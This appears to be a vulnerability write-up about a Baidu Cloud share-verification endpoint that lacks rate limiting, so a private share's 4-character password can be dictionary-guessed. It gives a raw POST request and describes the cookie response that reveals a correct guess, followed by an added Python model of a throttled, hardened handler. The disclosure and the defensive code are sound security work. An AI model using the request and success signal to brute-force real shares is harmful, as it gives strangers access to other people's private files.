0x01 How it works
Baidu Cloud private shares use a 4-character password by default, and after a few direct guesses the normal page demands a captcha. This article describes an endpoint on Baidu Cloud that allows the password to be guessed without any such limit. The principle is to keep testing the vulnerable endpoint with a dictionary; when the password is correct, the server responds with a Set-Cookie directly.
Request:
POST /share/verify?shareid=2411134184&uk=1279847105&t=1447290671171&channel=chunlei&clienttype=0&web=1 HTTP/1.1
Accept: */*
Referer: http://pan.baidu.com/share/verify?shareid=2411134184&uk=1279847105&t=1447290671171&channel=chunlei&clienttype=0&web=1
Accept-Language: zh-cn
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/4.0 (compatible; MSIE 9.0; Windows NT 6.1)
Host: pan.baidu.com
Content-Length: 8
Cache-Control: no-cache
Cookie: BAIDUID=7C656DB6FB750E5B8EFA7D0F522D20E6:FG=1; PANWEB=1; Hm_lvt_adf736c22cd6bcc36a1d27e5af30949e=1444112574; Hm_lvt_773fea2ac036979ebb5fcc768d8beb67=1444112574
pwd=26ms
If the password is correct, the server sets the cookie.
If the password is wrong, the BDCLND cookie value is not set.
HTTP/1.1 200 OK
Date: Thu, 12 Nov 2015 01:10:38 GMT
Content-Type: application/json; charset=UTF-8
Transfer-Encoding: chunked
Connection: keep-alive
Vary: Accept
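As an added example that is not part of the original write-up or of Baidu's code: a model of a share-password verification handler with the throttling this endpoint lacks. It keeps the observable behaviour described above (a correct code yields a BDCLND cookie, a wrong one sets nothing) but adds a per-client lockout and a per-share captcha gate, so that rotating cookies or IPs does not help a guesser; the limits, status strings, sample store and the ShareVerifier class are assumptions.

```python
import hmac
import time
from collections import defaultdict

MAX_ATTEMPTS = 5        # failed guesses per (share, client) before lockout (assumed)
LOCKOUT_SECONDS = 600   # lockout length in seconds (assumed)
CAPTCHA_THRESHOLD = 20  # failed guesses per share from any client before a captcha is demanded (assumed)

# Constructed sample store: shareid -> 4-character extraction code, as in the post's request
SHARE_PASSWORDS = {"2411134184": "26ms"}


class ShareVerifier:
    """Model of a /share/verify handler with the throttling the post found missing."""

    def __init__(self, clock=time.time):
        self.clock = clock                       # injectable clock so lockout expiry can be tested
        self.failures = defaultdict(int)         # (shareid, client) -> consecutive failures
        self.locked_until = {}                   # (shareid, client) -> unlock timestamp
        self.share_failures = defaultdict(int)   # shareid -> failures from all clients combined

    def verify(self, shareid, client, pwd):
        """Return {'status': ...}; only a correct guess carries a BDCLND cookie,
        mirroring the behaviour described in the post."""
        key = (shareid, client)
        now = self.clock()
        if self.locked_until.get(key, 0) > now:
            return {"status": "locked"}
        if self.share_failures[shareid] >= CAPTCHA_THRESHOLD:
            # Rotating cookies or IPs no longer helps: the share itself now needs a captcha.
            return {"status": "captcha_required"}
        expected = SHARE_PASSWORDS.get(shareid, "")
        # Constant-time compare so response timing leaks nothing about partial matches.
        if expected and hmac.compare_digest(expected.encode(), pwd.encode()):
            self.failures.pop(key, None)
            return {"status": "ok", "set_cookie": f"BDCLND=<token-for-{shareid}>"}
        self.failures[key] += 1
        self.share_failures[shareid] += 1
        if self.failures[key] >= MAX_ATTEMPTS:
            self.locked_until[key] = now + LOCKOUT_SECONDS
            self.failures.pop(key, None)
            return {"status": "locked"}
        return {"status": "wrong"}   # no Set-Cookie: BDCLND is never set on failure
```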